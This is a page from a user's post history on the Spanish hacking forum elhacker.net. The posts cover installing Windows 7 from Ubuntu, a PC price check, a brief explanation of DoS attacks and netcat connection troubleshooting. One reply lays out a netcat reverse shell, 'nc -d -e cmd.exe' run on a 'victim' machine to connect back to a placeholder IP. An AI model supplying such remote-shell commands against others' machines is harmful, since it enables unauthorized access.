elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6 7
21  Sistemas Operativos / GNU/Linux / Re: Instalar windows7 desde ubuntu en: 15 Enero 2012, 17:20 pm
Gracias por tu respuesa d3xd4uit

Pero querría crear el disco booteable desde ubuntu, ese link que me pusiste trataba de instalarlo desde windows y no tengo ningún pc con windows a mi disposición.
(De hecho es muy sencillo hacerlo desde windows)

Y reitero que todas esas aplicaciones son para windows, al menos eso creo y no emulables con wine, (probe con el winsetupfromusb)

Mi duda se centra en alguna aplicacion "PARA LINUX" que permita hacer booteable la iso de w7 desde un usb.

Siendo claros. exactamente lo que me has dicho tú pero para linux  :-\

Salu2
22  Seguridad Informática / Hacking / Re: Problema con Netcat en: 15 Enero 2012, 17:06 pm
Citar
Miren señores yo tengo un pequeño problema es que cuando le voy a sacar la IP con el netcat en vez de salirme la pagina en blanco me pide la contraseña.Claramente se cual es pero lo que psa es que tengo el netcat escuchando el puerto 80 y no me sale lo de la IP ni cuando pongo la contraseña amm....y cuando la pongo me sale algo parecido a la pantalla de configuracion de un router en vez la de un host ... si me lo pueden solucionar me ayudarian mucho Gracias y saludos de J0CK3$   

Sobra decir que eres poco concreto amigo :silbar:  :silbar:  :silbar:
Explícate mejor y quizás te podamos ayudar 

Salu2
23  Sistemas Operativos / GNU/Linux / Instalar windows7 desde ubuntu en: 15 Enero 2012, 16:47 pm
Hola chicos, Os tengo que hacer una consulta concreta y muy noob por no decir tal vez ridícula  ;) Hay va:
(Espero que no sea muy larga para preguntar tan poco)


En navidades compré un pc que venía sin OS y con la emoción ni lo pensé e instalé Ubuntu 11.10, funciona perfectamente y de hecho estoy muuuy contento con el

Pero como soy uno de esos tipos raros a los que les gusta tener windows...  

Pues eso, que ejjemm bajé una iso de win7 (No se lo digais a Billy ehh)

Y quería bootearla desde un USB, hasta ahí todo perfecto, pero.. (siempre hay un pero)

No encuentro un programa o en su defecto, el método, para grabar la ISO de w7 en el pen.

Siendo unetbootin un ejemplo de lo que necesito, de no ser porque no funciona con windows claro.

Os dejo un par de especificaciones que os podrían ser útiles (os dije que la pregunta era concreta  ;))

USB- 8GB
Iso de W7- Piratilla (ya comprobé que funciona bien en VirtualBox) no pongo el link porque creo que no esta permitido
Tengo un HD de 500 GB dedicado por completo con ubuntu (no me importa formatear ni particionar, ni naah xD)

No me importa que MBR sobreescriba GRUB ni borrar ubuntu (ya lo instalaré luego)

Ah, otra cosa, porfavor no seais trolls y me digais que deje ubuntu, o que instale w7 en una VM.

Gracias a todos, tanto por responder o ver el post

Salu2  ;)

[EDITO]

La primera duda está resuelta, ahora por no abrir un nuevo tema pregunto otra vez aquí (Si no se puede, pues lo siento  :-\ )

Pues ahora con la ISO ya grabada y arrancando desde el usb no me deja instalar el OS, me dice que debo usar NTFS como sistema de archivos, el caso es que no me deja formatear el HD, ni operar de ninguna forma con el.

Si alguien puede decirme como cambiar el sistema de archivos o crear una particion nueva en el disco duro principal, Bienvenido sea  ;)

Por favor, respuestas aplicables en linux
Reitero que me da igual perder ubuntu.

Gracias por permitirme abusar de su confianza (;
Salu2
24  Informática / Hardware / Re: Me están timando? en: 5 Enero 2012, 04:13 am
Citar
Diras i7 2600 3.4Ghz
Si, xD soy un mal enterado
Citar
Rom de 500GB? xD
A mi tambien me sorprendio tan poca capacidad, pero es lo de menos.

Citar
Que torre? Fuente? Marca de las memorias? Disco duro?
Por la torre ni pregunté, me aseguraron que dejaba espacio para que fluyera el aire y mejorar la refligeración.

Si te soy sincero no se las especificaciones de la fuente, creo que me dijeron que tiraba 500w, lo mismo con la RAM.

El disco duro es un samsung, no pregunté mucho más.

Lo que pido es una opiníon general de si ese precio merece esa configuración  ;)
25  Seguridad Informática / Hacking / Re: Duda sobre ataques de sobrecarga de un servidor en: 4 Enero 2012, 16:45 pm
Un ataque Dos (Denial of service) Consiste en sobrepasar el ancho de banda de un servidor enviando peticiones masivas, así obligando a desconectar el mismo.

Suponiendo que tengas mas ancho de banda que el servidor atacado podrías dejarlo desconectado por un tiempo ilimitado, siempre que el administrador al cargo no bloquee tu IP.

Lo que pasó con el WhatsApp fue que con tantas felicitaciones de año nuevo se saturo el servidor. Una anécdota curiosa, pero una simple anécdota.

Espero haberte ayudado.

Salu2
26  Informática / Hardware / Me están timando? en: 4 Enero 2012, 14:56 pm
Hola a todos.
Tras un año aguantando a mi piedra con luces

http://foro.elhacker.net/hardware/en_cuanto_valorariais_este_laptop-t343851.0.html Detalle humoristico xD

Y me ofrecen uno con estas especificaciones:

Procesador: i7 2300, a 3,4 Ghz, con 8 MB de cache
Ram: 8 GB
GPU: Nvidia GT 520, con 1 GB de memoria DDR3
Rom de 500 GB
Placa base gigabyte (el modelo no lo tengo anotado)

Ya ensamblado, pero sin sistema operativo ni perifericos.
Por un precio final de 580 euros.
(nota: Es de una ensambladora comercial con muchos años de experiencia)

Pues que os parece, es un buen pc a un buen precio o me están timando, vosotros me contais  ;)

Salu2
27  Seguridad Informática / Hacking / Re: net cat no me funciona fuera de mi red en: 4 Enero 2012, 14:48 pm
A ver: bsosa. Primero siento no haberte podido responder antes.

Citar
Pero no entido la opcion que me diste de verificar si la maquina tiene excepcion para permitir que abra el puerto. como veo esto?

Me refiero a que si el servidor (maquina en la que escuchas) tiene firewall debes añadir la excepcion.

Citar
Y te hago otra observación. la maquina (victima tiene internet por medio de un rowter y la maquina tiene el fireware desactivado y mi maquina esta con otro proveedor distinto pero en Wireles Modem USB.

What?, fireware por lo que tengo entendido es el estandar de transmision de datos de apple. Supongo que te refieres al firewall, si lo tienes desactivado en el servidor olvidate de la primera respuesta  ;-)  ;-)  ;-)

A ver, si esta bajo router igual tiene mil cosas que evitan que escuche un puerto, si tienes acceso fisico a la pc o al router mucho mejor, en principio abre el puerto que vallas a escuchar en el router.

Citar
Crees que existe la posibilidad de que esten bloqueados los puertos directamente por los proveedores de internet como lo es el puerto 21 o 25 u cualquier otro.

Posible: Si, Probable: En absoluto.
Si tienes tu router con tu LAN ahi nadie te va a tocar, en que les beneficiaria a ellos?. Si el ISP es de pago no creo que tengas ese problema. Y si ya dandose el caso de que tengas bloqueado un puerto, y que curiosamente sea el 5777.
No creo que te cueste cambiar el numero. xD

Citar
la maquina victima tiene internet por medio de ADSL y su direccion ip empieza asi: 192.168.xx.xx.

Esa ip solo sirve para comunicar pcs en LAN y si no estais bajo el mismo router no te servira  para nada.

Citar
tengo entendido que este tipo de direcciones son privadas y el rowter posee la publica, por lo cual no podre acceder a ella. =(

Da igual que las tenga el router, el mismo envia tu ip publica cada vez que conectas con un servidor web. (por poner un ejemplo).

Tu ip real puedes verla escribiendo en google "cualesmiip"  ;)
O si quieres desde la linea de comandos conectando a un servidor telnet o smtp publico y ejecutando el comando "EHLO".

Citar
Tienes alguna idea de como puedo hacer en este caso xq la mayoria de maquinas de mis amigos son por medio de Rowter ADSL... yo soy el unico que tengo por medio de UBS wireles el cual si es Publico.

Creo que esto ya queda respondido  ;)

De nuevo espero haberte ayudado
Salu2
28  Seguridad Informática / Hacking / Re: net cat no me funciona fuera de mi red en: 19 Diciembre 2011, 21:16 pm
Asegurate de esto:

Tienes abierto el puerto 5777 en el router (si lo usas)

La maquina que esta a la escucha tiene una excepción para permitir que el netcat abra el puerto

Te conectas a la maquina con su ip pública

Estos son los errores mas comunes.

Tambien puedes provar a usar una shell inversa:

Código:
nc -vv -l -p 5777
esto lo ejecutas en tu pc
Código:
nc -d -e cmd.exe T.U.I.P 5777
esto en el de la "victima"

Si siges sin poder conectarte ya nos cuentas  ;)
Espero haberte ayudado.
29  Programación / Desarrollo Web / Re: Html leer datos en: 9 Noviembre 2011, 19:14 pm
Vale, soy un noob total y absoluto.  :)
Rio por no llorar pero gracias a los dos

Salu2
30  Programación / Scripting / Re: Ayuda para "convertir" este VBS a BATCH en: 6 Noviembre 2011, 14:02 pm
Mira, no se si se te ajusta mucho, pero un usuario pregunto eso hace un tiempo
te dejo el link
http://foro.elhacker.net/scripting/solucionado_batch_ayuda_con_for_analizar_bitrate_mp3_de_archivos-t322007.0.html
Páginas: 1 2 [3] 4 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines